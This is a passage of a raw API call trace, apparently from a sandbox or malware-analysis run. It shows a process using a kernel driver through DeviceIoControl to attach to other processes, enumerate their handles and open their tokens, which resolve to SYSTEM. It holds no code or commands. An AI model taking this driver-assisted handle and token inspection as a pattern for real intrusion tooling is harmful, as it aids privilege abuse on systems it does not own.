ObReferenceObjectByHandle (in: Handle=0x8d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0028b69f0, HandleInformation=0x0) returned 0x0 [0244.252] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.252] PsReleaseProcessExitSynchronization () returned 0x2 [0244.252] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.252] ObQueryNameString (in: Object=0xfffff8a0028b69f0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.252] ObfDereferenceObject (Object=0xfffff8a0028b69f0) returned 0x1 [0244.252] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.252] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.252] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.252] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.252] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.252] PsAcquireProcessExitSynchronization () returned 0x0 [0244.252] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.252] ObReferenceObjectByHandle (in: Handle=0x8e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002ad4480, HandleInformation=0x0) returned 0x0 [0244.252] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.252] PsReleaseProcessExitSynchronization () returned 0x2 [0244.252] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.252] ObQueryNameString (in: Object=0xfffff8a002ad4480, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.252] ObfDereferenceObject (Object=0xfffff8a002ad4480) returned 0x1 [0244.252] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.253] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.253] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.253] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.253] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.253] PsAcquireProcessExitSynchronization () returned 0x0 [0244.253] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.253] ObReferenceObjectByHandle (in: Handle=0x930, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0016881a0, HandleInformation=0x0) returned 0x0 [0244.253] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.253] PsReleaseProcessExitSynchronization () returned 0x2 [0244.253] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.253] ObQueryNameString (in: Object=0xfffff8a0016881a0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.253] ObfDereferenceObject (Object=0xfffff8a0016881a0) returned 0x1 [0244.253] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.253] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.253] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.253] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.253] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.253] PsAcquireProcessExitSynchronization () returned 0x0 [0244.253] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.253] ObReferenceObjectByHandle (in: Handle=0x9ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0025f0840, HandleInformation=0x0) returned 0x0 [0244.253] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.253] PsReleaseProcessExitSynchronization () returned 0x2 [0244.253] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.253] ObQueryNameString (in: Object=0xfffff8a0025f0840, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.253] ObfDereferenceObject (Object=0xfffff8a0025f0840) returned 0x1 [0244.253] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.254] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.254] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.254] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.254] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.254] PsAcquireProcessExitSynchronization () returned 0x0 [0244.254] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.254] ObReferenceObjectByHandle (in: Handle=0x9d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002b8f260, HandleInformation=0x0) returned 0x0 [0244.254] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.254] PsReleaseProcessExitSynchronization () returned 0x2 [0244.254] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.254] ObQueryNameString (in: Object=0xfffff8a002b8f260, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.254] ObfDereferenceObject (Object=0xfffff8a002b8f260) returned 0x1 [0244.254] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.254] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0xc8 [0244.254] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.254] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800bafe630, HandleInformation=0x0) returned 0x0 [0244.254] ObOpenObjectByPointer (in: Object=0xfffffa800bafe630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0244.254] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6c [0244.254] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002096a80 | out: TokenHandle=0xfffffa8002096a80*=0xc4) returned 0x0 [0244.254] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0244.255] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.255] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.255] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.257] CloseHandle (hObject=0xc4) returned 1 [0244.257] CloseHandle (hObject=0xc8) returned 1 [0244.257] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.257] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.257] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.257] PsAcquireProcessExitSynchronization () returned 0x0 [0244.257] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880053c85d0) [0244.257] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003577a80, HandleInformation=0x0) returned 0x0 [0244.257] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.257] PsReleaseProcessExitSynchronization () returned 0x2 [0244.257] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6a [0244.257] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.257] ObfDereferenceObject (Object=0xfffffa8003577a80) returned 0x1 [0244.257] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.257] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.257] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.257] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.257] PsLookupProcessByProcessId (in: ProcessId=0x1ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.257] PsAcquireProcessExitSynchronization () returned 0x0 [0244.257] KeStackAttachProcess (in: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800bafe630, ApcState=0xfffff880053c85d0) [0244.257] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038f1500, HandleInformation=0x0) returned 0x0 [0244.257] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.257] PsReleaseProcessExitSynchronization () returned 0x2 [0244.257] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6a [0244.258] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.258] ObfDereferenceObject (Object=0xfffffa80038f1500) returned 0x1 [0244.258] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.258] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0xc8 [0244.258] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.258] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003498b30, HandleInformation=0x0) returned 0x0 [0244.258] ObOpenObjectByPointer (in: Object=0xfffffa8003498b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0244.258] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7b [0244.258] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002096a80 | out: TokenHandle=0xfffffa8002096a80*=0xc4) returned 0x0 [0244.258] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0244.258] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.258] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.258] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.260] CloseHandle (hObject=0xc4) returned 1 [0244.260] CloseHandle (hObject=0xc8) returned 1 [0244.260] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.260] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.260] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.260] PsAcquireProcessExitSynchronization () returned 0x0 [0244.260] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.260] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800358cea0, HandleInformation=0x0) returned 0x0 [0244.260] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.260] PsReleaseProcessExitSynchronization () returned 0x2 [0244.261] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.261] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.261] ObfDereferenceObject (Object=0xfffffa800358cea0) returned 0x1 [0244.261] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.261] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.261] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.261] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.261] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.261] PsAcquireProcessExitSynchronization () returned 0x0 [0244.261] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.261] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800d8718e0, HandleInformation=0x0) returned 0x0 [0244.261] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.261] PsReleaseProcessExitSynchronization () returned 0x2 [0244.261] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.261] ObQueryNameString (in: Object=0xfffffa800d8718e0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.261] ObfDereferenceObject (Object=0xfffffa800d8718e0) returned 0x1 [0244.261] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.261] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.261] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.261] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.261] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.261] PsAcquireProcessExitSynchronization () returned 0x0 [0244.261] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.261] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003657dd0, HandleInformation=0x0) returned 0x0 [0244.261] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.262] PsReleaseProcessExitSynchronization () returned 0x2 [0244.262] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.262] ObQueryNameString (in: Object=0xfffffa8003657dd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.262] ObfDereferenceObject (Object=0xfffffa8003657dd0) returned 0x2 [0244.262] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.262] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.262] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.262] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.262] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.262] PsAcquireProcessExitSynchronization () returned 0x0 [0244.262] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.262] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003652f20, HandleInformation=0x0) returned 0x0 [0244.262] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.262] PsReleaseProcessExitSynchronization () returned 0x2 [0244.262] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.262] ObQueryNameString (in: Object=0xfffffa8003652f20, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.262] ObfDereferenceObject (Object=0xfffffa8003652f20) returned 0x1 [0244.263] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.263] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.263] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.263] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.263] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.263] PsAcquireProcessExitSynchronization () returned 0x0 [0244.263] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.263] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003497970, HandleInformation=0x0) returned 0x0 [0244.263] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.263] PsReleaseProcessExitSynchronization () returned 0x2 [0244.263] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.263] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.263] ObfDereferenceObject (Object=0xfffffa8003497970) returned 0x1 [0244.263] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.263] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.263] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.263] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.263] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.263] PsAcquireProcessExitSynchronization () returned 0x0 [0244.263] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.263] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003549c80, HandleInformation=0x0) returned 0x0 [0244.264] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.264] PsReleaseProcessExitSynchronization () returned 0x2 [0244.264] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.264] ObQueryNameString (in: Object=0xfffffa8003549c80, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.264] ObfDereferenceObject (Object=0xfffffa8003549c80) returned 0x2 [0244.264] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.264] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.264] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.264] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, 